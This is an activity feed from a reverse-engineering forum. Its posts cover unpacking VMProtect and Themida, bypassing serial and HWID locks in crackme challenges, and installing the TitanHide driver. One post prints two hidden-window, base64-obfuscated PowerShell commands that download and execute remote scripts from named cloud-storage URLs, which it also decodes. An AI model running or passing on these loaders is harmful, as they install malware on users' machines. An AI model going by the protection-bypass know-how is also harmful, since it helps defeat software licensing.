All Activity
- Past hour
-
deck joined the community
- Today
-
tutstick joined the community
- Yesterday
-
Abdalkader joined the community
-
moo joined the community
-
LegacyDev joined the community
-
Revteam Reverse Engineering Collection
mdj replied to markaz.jamal's topic in Reverse Engineering Articles
check pm
shani joined the community
-
Morlac joined the community
-
New Year - New Mind started following kaganimo
-
New Year - New Mind started following csalcin06
-
AarJee started following CodeExplorer
-
New Year - New Mind started following gavz
- Last week
-
I have a question: how do I create that shfolder.dll? Did you create it yourself, or how does the process go? Can anyone answer me, please?
-
@Teddy Rogers I should search in my archive, give me some time.
-
New Year - New Mind started following Passenger6938
-
booler started following GIV
-
booler started following LCF-AT
-
4ss3m changed their profile photo
-
tazmir started following Driver doesn't want to start
-
TitanHide had a new update 3 weeks ago, but I can't find the TitanHide.sys file, and I tried to compile it but it's not working. Help me please. (These are the steps I tried, but there were many errors.)
Installation Method 1
1. Copy TitanHide.sys to %systemroot%\system32\drivers.
2. Run the command sc create TitanHide binPath= %systemroot%\system32\drivers\TitanHide.sys type= kernel to create the TitanHide service.
3. Run the command sc start TitanHide to start the TitanHide service.
4. Run the command sc query TitanHide to check if TitanHide is running.
Installation Method 2
1. Copy TitanHide.sys to %systemroot%\system32\drivers.
2. Start ServiceManager.exe (available on the download page).
3. Delete the old service (when present).
4. Install a new service (specify the full path to TitanHide.sys).
5. Start the service you just created.
6. Use TitanHideGUI.exe to set hide options for a PID.
-
@HostageOfCode Do you mean that it does not run on your system? It runs on my system after dumping, but the AddressOfEntryPoint is invalid? And after rebooting my PC, it does not run. Regards. sean.
-
Your IAT is not solved correctly. Put a bp on GetProcAddress and log all the APIs. Tried to make it run with the virtualized functions but without success so far. It uses IsProcessorFeaturePresent and other tricks to detect unpacking.
-
I recommend people use this protection because it's very good. The protection is advanced like PELock but very good. Only a real reverser can do it, but it needs much time to be able to handle it.
@14yoKID Hey, man. Can you send me the log? Regards. sean.
-
@New Year - New Mind Hey New Year! You will have to trace it through the VM. I used CE and basically logged all of the things from start to end. I'm pretty sure I saved the CE log on my PC; if not, I'll see to doing it again and send it to you so you can observe the things I did.
-
@14yoKID How to find the conditional jump after the VMProtectSetSerialNumber function? Regards. sean.
-
Cybercriminal changed their profile photo
-
@Gladiator would have to reupload unless someone kept a copy... Ted.
-
I'm pretty sure I have patched most of the things successfully. Results: Screen Recording - Made with FlexClip.webm
-
I assume it depends on the protection settings. Try unpacking this target
-
WinLicense v3.2.2 (Window Function Through an External Plugin)
Noob boy replied to lengyue's topic in CrackMe
This plugin is much more powerful than the original WinLicense. 80-90% of people can't get around it!
-
@HostageOfCode How to reduce the size of the dump? My resulting dump is this, but its size is not reduced. hashgen_protected_Entry_VMed_dump_SCY.zip Regards. sean.
-
Revteam Reverse Engineering Collection
ixArman replied to markaz.jamal's topic in Reverse Engineering Articles
Hi, when I try to download the files it keeps showing "Failed to get source link". What's the issue?
-
@HostageOfCode You have done it, man. Many thanks. Regards. sean.
-
Hmm, expected Themida to be harder, but it was not even 5% harder to unpack than VMProtect. hashgen_protected_Entry_VMed__fixed.exe
-
link1 =>> pOwerSHell -w HIddeN "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmV3YnVjazEyLm9zcy1hcC1zb3V0aGVhc3QtNy5hbGl5dW5jcy5jb20vcEpLcmJHU0kudHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex decoded =>>https://newbuck12.oss-ap-southeast-7.aliyuncs.com/pJKrbGSI.txt link2 =>> PoWErsHeLL -W HiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vc2FuZGlzazIub3NzLWFwLW5vcnRoZWFzdC0yLmFsaXl1bmNzLmNvbS9vTGpmZVBqZy50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex decoded =>>https://sandisk2.oss-ap-northeast-2.aliyuncs.com/oLjfePjg.txt
-
VMProtect x64 v3.6 HWID Lock (All Protection Options)
New Year - New Mind replied to boot's topic in UnPackMe
@StarrySky Can you please post a video if you successfully make it run? Regards. sean.
-
VMProtect x64 v3.6 HWID Lock (All Protection Options)
New Year - New Mind replied to boot's topic in UnPackMe
@HostageOfCode Is this option implemented with the vmp license manager that you linked? Regards. sean.
-
VMProtect x64 v3.6 HWID Lock (All Protection Options)
HostageOfCode replied to boot's topic in UnPackMe
https://forum.tuts4you.com/topic/44928-vmprotect-web-license-manager-v214
-
VMProtect x64 v3.6 HWID Lock (All Protection Options)
New Year - New Mind replied to boot's topic in UnPackMe
@StarrySky Can you make this serial-locked one run? I have zipped a wrong serial.txt and the protected executable to make a challenge. hashgen.vmp.serial.locked.zip If you edit the first character of the serial.txt file, this executable will run. Or you have to find the test and conditional jump instructions which are virtualized after the VMProtectSetSerialNumber function. This function returns 2, which means that the serial is invalid; when it returns 0, this executable will run. And I have a question about how to use a VMProtect feature. I protected a procedure called "OnBnClicked..." with the options above, and when I clicked the button while it runs, it shows this message and is terminated. How to use this option properly? Regards. sean.
-
VMProtect x64 v3.6 HWID Lock (All Protection Options)
New Year - New Mind replied to boot's topic in UnPackMe
@StarrySky How to do it? Regards. sean.